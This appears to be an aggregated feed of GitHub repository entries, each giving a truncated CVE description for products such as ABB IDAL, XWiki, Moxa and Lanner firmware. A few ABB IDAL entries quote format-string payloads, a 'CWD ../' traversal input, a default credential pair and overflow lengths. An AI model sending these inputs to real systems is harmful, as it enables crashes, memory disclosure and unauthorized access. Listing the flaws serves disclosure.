**NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer, where any local user can cause a null-pointer dereference, which may lead to a kernel panic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31613](https://github.com/Live-Hack-CVE/CVE-2022-31613) create time: 2022-12-28T03:17:25Z

**Integer overflow in the gst_vorbis_tag_add_coverart function (gst-libs/gst/tag/gstvorbistag.c) in vorbistag in gst-plugins-base (aka gstreamer-plugins-base) before 0.10.23 in GStreamer allows context-dependent attackers to execute arbitrary code via a crafted COVERART tag that is converted from a base64 representation, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-0586](https://github.com/Live-Hack-CVE/CVE-2009-0586) create time: 2022-12-28T02:37:46Z

**Cross-site scripting (XSS) vulnerability in the administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.23 on z/OS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-0855](https://github.com/Live-Hack-CVE/CVE-2009-0855) create time: 2022-12-28T01:49:05Z

**In Botan before 2.19.3, it is possible to forge OCSP responses due to a certificate verification error. This issue was introduced in Botan 1.11.34 (November 2016). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43705](https://github.com/Live-Hack-CVE/CVE-2022-43705) create time: 2022-12-28T02:28:26Z

**Jenkins before versions 2.44 and 2.32.2 is vulnerable to an insufficient permission check. This allows users with permissions to create new items (e.g. jobs) to overwrite existing items they don't have access to (SECURITY-321). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2599](https://github.com/Live-Hack-CVE/CVE-2017-2599) create time: 2022-12-28T02:35:13Z

**AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. Code is executed under the program runtime privileges, which could lead to the compromise of the machine. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6543](https://github.com/Live-Hack-CVE/CVE-2019-6543) create time: 2022-12-28T02:32:50Z

**A Bleichenbacher type side-channel based padding oracle attack was found in the way gnutls handles verification of RSA decrypted PKCS#1 v1.5 data. An attacker who is able to run process on the same physical core as the victim process, could use this to extract plaintext or in some cases downgrade any TLS connections to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16868](https://github.com/Live-Hack-CVE/CVE-2018-16868) create time: 2022-12-28T02:35:07Z

**postgresql before versions 10.4, 9.6.9 is vulnerable in the adminpack extension, the pg_catalog.pg_logfile_rotate() function doesn't follow the same ACLs than pg_rorate_logfile. If the adminpack is added to a database, an attacker able to connect to it could exploit this to force log rotation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1115](https://github.com/Live-Hack-CVE/CVE-2018-1115) create time: 2022-12-28T02:35:03Z

**admin/partials/wp-splashing-admin-main.php in the Splashing Images plugin (wp-splashing-images) before 2.1.1 for WordPress allows authenticated (administrator, editor, or author) remote attackers to conduct PHP Object Injection attacks via crafted serialized data in the 'session' HTTP GET parameter to wp-admin/upload.p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6195](https://github.com/Live-Hack-CVE/CVE-2018-6195) create time: 2022-12-28T01:47:56Z

**The script '/adminui/error_details.php' in the Quest KACE System Management Appliance 8.0.318 allows authenticated users to conduct PHP object injection attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-11135](https://github.com/Live-Hack-CVE/CVE-2018-11135) create time: 2022-12-28T01:47:52Z

**Passing an absolute path to a file_exists check in phpBB before 3.2.4 allows Remote Code Execution through Object Injection by employing Phar deserialization when an attacker has access to the Admin Control Panel with founder permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19274](https://github.com/Live-Hack-CVE/CVE-2018-19274) create time: 2022-12-28T01:47:38Z

**PHPMailer before 5.2.27 and 6.x before 6.0.6 is vulnerable to an object injection attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19296](https://github.com/Live-Hack-CVE/CVE-2018-19296) create time: 2022-12-28T01:47:34Z

**It was found that the fix for CVE-2018-14648 in 389-ds-base, versions 1.4.0.x before 1.4.0.17, was incorrectly applied in RHEL 7.5. An attacker would still be able to provoke excessive CPU consumption leading to a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10171](https://github.com/Live-Hack-CVE/CVE-2019-10171) create time: 2022-12-28T02:35:00Z

**PowerDNS Authoritative daemon , pdns versions 4.0.x before 4.0.9, 4.1.x before 4.1.11, exiting when encountering a serial between 2^31 and 2^32-1 while trying to notify a slave leads to DoS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10203](https://github.com/Live-Hack-CVE/CVE-2019-10203) create time: 2022-12-28T02:34:56Z

**A flaw was found in the Ceph RGW configuration with Beast as the front end handling client requests. An unauthenticated attacker could crash the Ceph RGW server by sending valid HTTP headers and terminating the connection, resulting in a remote denial of service for Ceph RGW clients. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10222](https://github.com/Live-Hack-CVE/CVE-2019-10222) create time: 2022-12-28T02:34:53Z

**A flaw was found in the 'deref' plugin of 389-ds-base where it could use the 'search' permission to display attribute values. In some configurations, this could allow an authenticated attacker to view private attributes, such as password hashes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14824](https://github.com/Live-Hack-CVE/CVE-2019-14824) create time: 2022-12-28T02:34:49Z

**The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session in an authenticated state and returns the session ID along with what may be the username and cleartext pas CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7226](https://github.com/Live-Hack-CVE/CVE-2019-7226) create time: 2022-12-28T02:34:46Z

**The ABB IDAL FTP server mishandles format strings in a username during the authentication process. Attempting to authenticate with the username %s%p%x%d will crash the server. Sending %08x.AAAA.%08x.%08x will log memory content from the stack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7230](https://github.com/Live-Hack-CVE/CVE-2019-7230) create time: 2022-12-28T02:34:43Z

**In the ABB IDAL FTP server, an authenticated attacker can traverse to arbitrary directories on the hard disk with "CWD ../" and then use the FTP server functionality to download and upload files. An unauthenticated attacker can take advantage of the hardcoded or default credential pair exor/exor to become an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7227](https://github.com/Live-Hack-CVE/CVE-2019-7227) create time: 2022-12-28T02:34:39Z

**The ABB IDAL FTP server is vulnerable to a buffer overflow when a long string is sent by an authenticated attacker. This overflow is handled, but terminates the process. An authenticated attacker can send a FTP command string of 472 bytes or more to overflow a buffer, causing an exception that terminates the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7231](https://github.com/Live-Hack-CVE/CVE-2019-7231) create time: 2022-12-28T02:34:36Z

**The ABB IDAL HTTP server is vulnerable to a buffer overflow when a long Host header is sent in a web request. The Host header value overflows a buffer and overwrites a Structured Exception Handler (SEH) address. An unauthenticated attacker can submit a Host header value of 2047 bytes or more to overflow the buffer and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7232](https://github.com/Live-Hack-CVE/CVE-2019-7232) create time: 2022-12-28T02:34:32Z

**The ABB IDAL HTTP server mishandles format strings in a username or cookie during the authentication process. Attempting to authenticate with the username %25s%25p%25x%25n will crash the server. Sending %08x.AAAA.%08x.%08x will log memory content from the stack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7228](https://github.com/Live-Hack-CVE/CVE-2019-7228) create time: 2022-12-28T02:34:29Z

**A recently discovered security vulnerability affects all Bosch Video Management System (BVMS) versions 9.0 and below, DIVAR IP 2000, 3000, 5000 and 7000, Video Recording Manager (VRM), Video Streaming Gateway (VSG), Configuration Manager, Building Integration System (BIS) with Video Engine, Access Professional Edition CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6957](https://github.com/Live-Hack-CVE/CVE-2019-6957) create time: 2022-12-28T02:34:26Z

**An Improper Check for Unusual or Exceptional Conditions (CWE-754) vulnerability exists in Modicon Quantum 140 NOE771x1 version 6.9 and earlier, which could cause denial of service when the module receives an IP fragmented packet with a length greater than 65535 bytes. The module then requires a power cycle to recover. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6811](https://github.com/Live-Hack-CVE/CVE-2019-6811) create time: 2022-12-28T02:34:22Z

**A Format String: CWE-134 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could allow an attacker to send a crafted message to the target serv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6840](https://github.com/Live-Hack-CVE/CVE-2019-6840) create time: 2022-12-28T02:34:18Z

**A Server-Side Request Forgery (SSRF): CWE-918 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could cause server configuration data to be exp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6837](https://github.com/Live-Hack-CVE/CVE-2019-6837) create time: 2022-12-28T02:34:15Z

**A Cross-Site Scripting (XSS) CWE-79 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could allow an attacker to inject client-side script when CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6835](https://github.com/Live-Hack-CVE/CVE-2019-6835) create time: 2022-12-28T02:34:12Z

**Structured reply is a feature of the newstyle NBD protocol allowing the server to send a reply in chunks. A bounds check which was supposed to test for chunk offsets smaller than the beginning of the request did not work because of signed/unsigned confusion. If one of these chunks contains a negative offset then data u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14842](https://github.com/Live-Hack-CVE/CVE-2019-14842) create time: 2022-12-28T02:33:46Z

**Canonical snapd before version 2.37.1 incorrectly performed socket owner validation, allowing an attacker to run arbitrary commands as root. This issue affects: Canonical snapd versions prior to 2.37.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7304](https://github.com/Live-Hack-CVE/CVE-2019-7304) create time: 2022-12-28T02:33:42Z

**A flaw was found in the /oauth/token/request custom endpoint of the OpenShift OAuth server allowing for XSS generation of CLI tokens due to missing X-Frame-Options and CSRF protections. If not otherwise prevented, a separate XSS vulnerability via JavaScript could further allow for the extraction of these tokens. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3876](https://github.com/Live-Hack-CVE/CVE-2019-3876) create time: 2022-12-28T02:33:39Z

**In Foreman it was discovered that the delete compute resource operation, when executed from the Foreman API, leads to the disclosure of the plaintext password or token for the affected compute resource. A malicious user with the "delete_compute_resource" permission can use this flaw to take control over compute resourc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3893](https://github.com/Live-Hack-CVE/CVE-2019-3893) create time: 2022-12-28T02:33:35Z

**A race condition in perf_event_open() allows local attackers to leak sensitive data from setuid programs. As no relevant locks (in particular the cred_guard_mutex) are held during the ptrace_may_access() call, it is possible for the specified target task to perform an execve() syscall with setuid execution before perf_ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3901](https://github.com/Live-Hack-CVE/CVE-2019-3901) create time: 2022-12-28T02:33:32Z

**GE Communicator, all versions prior to 4.0.517, allows an attacker to place malicious files within the working directory of the program, which may allow an attacker to manipulate widgets and UI elements. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6546](https://github.com/Live-Hack-CVE/CVE-2019-6546) create time: 2022-12-28T02:33:28Z

**Delta Industrial Automation CNCSoft, CNCSoft ScreenEditor Version 1.00.84 and prior. An out-of-bounds read vulnerability may cause the software to crash due to lacking user input validation for processing project files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6547](https://github.com/Live-Hack-CVE/CVE-2019-6547) create time: 2022-12-28T02:33:25Z

**GE Communicator, all versions prior to 4.0.517, contains two backdoor accounts with hardcoded credentials, which may allow control over the database. This service is inaccessible to attackers if Windows default firewall settings are used by the end user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6548](https://github.com/Live-Hack-CVE/CVE-2019-6548) create time: 2022-12-28T02:33:22Z

**Several buffer overflow vulnerabilities have been identified in Moxa IKS and EDS, which may allow remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6557](https://github.com/Live-Hack-CVE/CVE-2019-6557) create time: 2022-12-28T02:33:18Z

**Cscape, 9.80 SP4 and prior. An improper input validation vulnerability may be exploited by processing specially crafted POC files. This may allow an attacker to read confidential information and remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6555](https://github.com/Live-Hack-CVE/CVE-2019-6555) create time: 2022-12-28T02:33:15Z

**Moxa IKS and EDS allow remote authenticated users to cause a denial of service via a specially crafted packet, which may cause the switch to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6559](https://github.com/Live-Hack-CVE/CVE-2019-6559) create time: 2022-12-28T02:33:12Z

**Cross-site request forgery has been identified in Moxa IKS and EDS, which may allow for the execution of unauthorized actions on the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6561](https://github.com/Live-Hack-CVE/CVE-2019-6561) create time: 2022-12-28T02:33:08Z

**In Philips Tasy EMR, Tasy EMR Versions 3.02.1744 and prior, the software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6562](https://github.com/Live-Hack-CVE/CVE-2019-6562) create time: 2022-12-28T02:33:04Z

**Moxa IKS and EDS fails to properly validate user input, giving unauthenticated and authenticated attackers the ability to perform XSS attacks, which may be used to send a malicious script. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6565](https://github.com/Live-Hack-CVE/CVE-2019-6565) create time: 2022-12-28T02:33:00Z

**Moxa IKS and EDS fails to properly check array bounds which may allow an attacker to read device memory on arbitrary addresses, and may allow an attacker to retrieve sensitive data or cause device reboot. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6522](https://github.com/Live-Hack-CVE/CVE-2019-6522) create time: 2022-12-28T02:32:57Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2801](https://github.com/Live-Hack-CVE/CVE-2020-2801) create time: 2022-12-28T02:37:49Z

**LibRaw before 0.20-RC1 lacks a thumbnail size range check. This affects decoders/unpack_thumb.cpp, postprocessing/mem_image.cpp, and utils/thumb_utils.cpp. For example, malloc(sizeof(libraw_processed_image_t)+T.tlength) occurs without validating T.tlength. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15503](https://github.com/Live-Hack-CVE/CVE-2020-15503) create time: 2022-12-28T02:32:47Z

**A flaw was found in keycloak affecting versions 11.0.3 and 12.0.0. An expired certificate would be accepted by the direct-grant authenticator because of missing time stamp validations. The highest threat from this vulnerability is to data confidentiality and integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35509](https://github.com/Live-Hack-CVE/CVE-2020-35509) create time: 2022-12-28T02:31:39Z

**A Java Serialization vulnerability was found in Apache Tapestry 4. Apache Tapestry 4 will attempt to deserialize the "sp" parameter even before invoking the page's validate method, leading to deserialization without authentication. Apache Tapestry 4 reached end of life in 2008 and no update to address this issue will b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17531](https://github.com/Live-Hack-CVE/CVE-2020-17531) create time: 2022-12-28T01:47:49Z

**A flaw was found in keycloak, where the default ECP binding flow allows other authentication flows to be bypassed. By exploiting this behavior, an attacker can bypass the MFA authentication by sending a SOAP request with an AuthnRequest and Authorization header with the user's credentials. The highest threat from this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3827](https://github.com/Live-Hack-CVE/CVE-2021-3827) create time: 2022-12-28T02:36:48Z

**Use of hard-coded TLS certificate by default allows an attacker to perform Man-in-the-Middle (MitM) attacks even in the presence of the HTTPS connection. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.00.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4228](https://github.com/Live-Hack-CVE/CVE-2021-4228) create time: 2022-12-28T02:30:44Z

**Session fixation and insufficient session expiration vulnerabilities allow an attacker to perfom session hijacking attacks against users. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46279](https://github.com/Live-Hack-CVE/CVE-2021-46279) create time: 2022-12-28T02:30:21Z

**Observable discrepancies in the login process allow an attacker to guess legitimate user names registered in the BMC. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45925](https://github.com/Live-Hack-CVE/CVE-2021-45925) create time: 2022-12-28T02:30:18Z

**A broken access control vulnerability in the SubNet_handler_func function of spx_restservice allows an attacker to arbitrarily change the security access rights to KVM and Virtual Media functionalities. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44776](https://github.com/Live-Hack-CVE/CVE-2021-44776) create time: 2022-12-28T02:30:14Z

**An improper input validation vulnerability in the TLS certificate generation function allows an attacker to cause a Denial-of-Service (DoS) condition which can only be reverted via a factory reset. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44769](https://github.com/Live-Hack-CVE/CVE-2021-44769) create time: 2022-12-28T02:30:11Z

**A broken access control vulnerability in the KillDupUsr_func function of spx_restservice allows an attacker to arbitrarily terminate active sessions of other users, causing a Denial-of-Service (DoS) condition. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44467](https://github.com/Live-Hack-CVE/CVE-2021-44467) create time: 2022-12-28T02:30:07Z

**A broken access control vulnerability in the FirstReset_handler_func function of spx_restservice allows an attacker to arbitrarily send reboot commands to the BMC, causing a Denial-of-Service (DoS) condition. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26733](https://github.com/Live-Hack-CVE/CVE-2021-26733) create time: 2022-12-28T02:30:04Z

**A broken access control vulnerability in the First_network_func function of spx_restservice allows an attacker to arbitrarily change the network configuration of the BMC. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26732](https://github.com/Live-Hack-CVE/CVE-2021-26732) create time: 2022-12-28T02:30:00Z

**Command injection and multiple stack-based buffer overflows vulnerabilities in the modifyUserb_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26731](https://github.com/Live-Hack-CVE/CVE-2021-26731) create time: 2022-12-28T02:29:57Z

**Velneo vClient on its 28.1.3 version, could allow an attacker with knowledge of the victims's username and hashed password to spoof the victim's id against the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45036](https://github.com/Live-Hack-CVE/CVE-2021-45036) create time: 2022-12-28T01:54:57Z

**A use-after-free flaw was found in libvirt. The qemuMonitorUnregister() function in qemuProcessHandleMonitorEOF is called using multiple threads without being adequately protected by a monitor lock. This flaw could be triggered by the virConnectGetAllDomainStats API when the guest is shutting down. An unprivileged clie CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3975](https://github.com/Live-Hack-CVE/CVE-2021-3975) create time: 2022-12-28T01:51:24Z

**ZKConfigurationStore which is optionally used by CapacityScheduler of Apache Hadoop YARN deserializes data obtained from ZooKeeper without validation. An attacker having access to ZooKeeper can run arbitrary commands as YARN user by exploiting this. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.4 or later (c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25642](https://github.com/Live-Hack-CVE/CVE-2021-25642) create time: 2022-12-28T01:51:21Z

**Improper access control vulnerability in PENUP prior to version 3.8.00.18 allows arbitrary webpage loading in webview. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25463](https://github.com/Live-Hack-CVE/CVE-2021-25463) create time: 2022-12-28T01:51:00Z

**SEPPMail's web frontend, user input is not embedded correctly in the web page and therefore leads to cross-site scripting vulnerabilities (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31740](https://github.com/Live-Hack-CVE/CVE-2021-31740) create time: 2022-12-28T01:49:26Z

**A vulnerability was found in Sapido BR270n, BRC76n, GR297 and RB1732 and classified as critical. Affected by this issue is some unknown functionality of the file ip/syscmd.htm. The manipulation leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be us CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4242](https://github.com/Live-Hack-CVE/CVE-2021-4242) create time: 2022-12-28T01:48:58Z

**Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26948](https://github.com/Live-Hack-CVE/CVE-2021-26948) create time: 2022-12-28T01:48:00Z

**XWiki Platform is vulnerable to Cross-Site Request Forgery (CSRF) that may allow attackers to delete or rename tags without needing any confirmation. The problem has been patched in XWiki 13.10.7, 14.4.1 and 14.5RC1. Workarounds: It's possible to patch existing instances directly by editing the page Main.Tags and add t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41927](https://github.com/Live-Hack-CVE/CVE-2022-41927) create time: 2022-12-28T02:37:53Z

**FileCloud Versions 20.2 and later allows remote attackers to potentially cause unauthorized remote code execution and access to reported API endpoints via a crafted HTTP request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39833](https://github.com/Live-Hack-CVE/CVE-2022-39833) create time: 2022-12-28T02:37:42Z

**XWiki Platform vulnerable to Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') in AttachmentSelector.xml. The issue can also be reproduced by inserting the dangerous payload in the `height` or `alt` macro properties. This has been patched in versions 13.10.7, 14.4.2, and 14.5. The i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41928](https://github.com/Live-Hack-CVE/CVE-2022-41928) create time: 2022-12-28T02:37:39Z

**org.xwiki.platform:xwiki-platform-oldcore is missing authorization in User#setDisabledStatus, which may allow an incorrectly authorized user with only Script rights to enable or disable a user. This operation is meant to only be available for users with admin rights. This problem has been patched in XWiki 13.10.7, 14.4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41929](https://github.com/Live-Hack-CVE/CVE-2022-41929) create time: 2022-12-28T02:37:35Z

**org.xwiki.platform:xwiki-platform-user-profile-ui is missing authorization to enable or disable users. Any user (logged in or not) with access to the page XWiki.XWikiUserProfileSheet can enable or disable any user profile. This might allow to a disabled user to re-enable themselves, or to an attacker to disable any use CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41930](https://github.com/Live-Hack-CVE/CVE-2022-41930) create time: 2022-12-28T02:37:32Z

**xwiki-platform-icon-ui is vulnerable to Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection'). Any user with view rights on commonly accessible documents including the icon picker macro can execute arbitrary Groovy, Python or Velocity code in XWiki due to improper neutralization of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41931](https://github.com/Live-Hack-CVE/CVE-2022-41931) create time: 2022-12-28T02:37:29Z

**XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with view rights on commonly accessible documents including the menu macro can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation due to improper esc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41934](https://github.com/Live-Hack-CVE/CVE-2022-41934) create time: 2022-12-28T02:37:25Z

**XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users without the right to view documents can deduce their existence by repeated Livetable queries. The issue has been patched in XWiki 14.6RC1, 13.10.8, and 14.4.3, the response is not properly cleaned up of obfusc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41935](https://github.com/Live-Hack-CVE/CVE-2022-41935) create time: 2022-12-28T02:37:20Z

**File upload vulnerability in asith-eranga ISIC tour booking through version published on Feb 13th 2018, allows attackers to upload arbitrary files via /system/application/libs/js/tinymce/plugins/filemanager/dialog.php and /system/application/libs/js/tinymce/plugins/filemanager/upload.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30529](https://github.com/Live-Hack-CVE/CVE-2022-30529) create time: 2022-12-28T02:37:01Z

**XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It's possible to make XWiki create many new schemas and fill them with tables just by using a crafted user identifier in the login form. This may lead to degraded database performance. The problem has been patched i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41932](https://github.com/Live-Hack-CVE/CVE-2022-41932) create time: 2022-12-28T02:36:58Z

**CRITICAL: An improper neutralization of argument delimiters in a command vulnerability was identified in GitHub Enterprise Server that enabled remote code execution. To exploit this vulnerability, an attacker would need permission to create and build GitHub Pages using GitHub Actions. This vulnerability affected only v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23740](https://github.com/Live-Hack-CVE/CVE-2022-23740) create time: 2022-12-28T02:36:54Z

**An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. A stack buffer overflow leads to arbitrary code execution in the SetupUtility driver on Intel platforms. An attacker can change the values of certain UEFI variables. If the size of the second variable exceeds the size of the first, then the buffer CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35407](https://github.com/Live-Hack-CVE/CVE-2022-35407) create time: 2022-12-28T02:36:51Z

**An stack buffer overflow vulnerability leads to arbitrary code execution issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. If the attacker modifies specific UEFI variables, it can cause a stack overflow, leading to arbitrary code execution. The specific variables are normally locked (read-only) at t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35897](https://github.com/Live-Hack-CVE/CVE-2022-35897) create time: 2022-12-28T02:36:44Z

**singlevar in lparser.c in Lua from (including) 5.4.0 up to (excluding) 5.4.4 lacks a certain luaK_exp2anyregup call, leading to a heap-based buffer over-read that might affect a system that compiles untrusted Lua code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28805](https://github.com/Live-Hack-CVE/CVE-2022-28805) create time: 2022-12-28T02:36:41Z

**Check Point ZoneAlarm before version 15.8.200.19118 allows a local actor to escalate privileges during the upgrade process. In addition, weak permissions in the ProgramData\CheckPoint\ZoneAlarm\Data\Updates directory allow a local attacker the ability to execute an arbitrary file write, leading to execution of code as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23743](https://github.com/Live-Hack-CVE/CVE-2022-23743) create time: 2022-12-28T02:36:37Z

**A directory traversal vulnerability in the ZIP archive extraction routines of KNIME Server since 4.3.0 can result in arbitrary files being overwritten on the server's file system. This vulnerability is also known as 'Zip-Slip'. An attacker can create a KNIME workflow that, when being uploaded, can overwrite arbitrary f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44748](https://github.com/Live-Hack-CVE/CVE-2022-44748) create time: 2022-12-28T02:36:34Z

**A directory traversal vulnerability in the ZIP archive extraction routines of KNIME Analytics Platform 3.2.0 and above can result in arbitrary files being overwritten on the user's system. This vulnerability is also known as 'Zip-Slip'. An attacker can create a KNIME workflow that, when being opened by a user, can over CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44749](https://github.com/Live-Hack-CVE/CVE-2022-44749) create time: 2022-12-28T02:36:30Z

**Dangerous method exposed which can lead to RCE in qmpass/leadshop v1.4.15 allows an attacker to control the target host by calling any function in leadshop.php via the GET method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4136](https://github.com/Live-Hack-CVE/CVE-2022-4136) create time: 2022-12-28T02:36:27Z

**Improper Input Validation vulnerability in Mitsubishi Electric GOT2000 Series GT27 model FTP server versions 01.39.000 and prior, Mitsubishi Electric GOT2000 Series GT25 model FTP server versions 01.39.000 and prior and Mitsubishi Electric GOT2000 Series GT23 model FTP server versions 01.39.000 and prior allows a remot CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40266](https://github.com/Live-Hack-CVE/CVE-2022-40266) create time: 2022-12-28T02:36:23Z

**super-xray is a web vulnerability scanning tool. Versions prior to 0.7 assumed trusted input for the program config which is stored in a yaml file. An attacker with local access to the file could exploit this and compromise the program. This issue has been addressed in commit `4d0d5966` and will be included in future r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41958](https://github.com/Live-Hack-CVE/CVE-2022-41958) create time: 2022-12-28T02:36:20Z

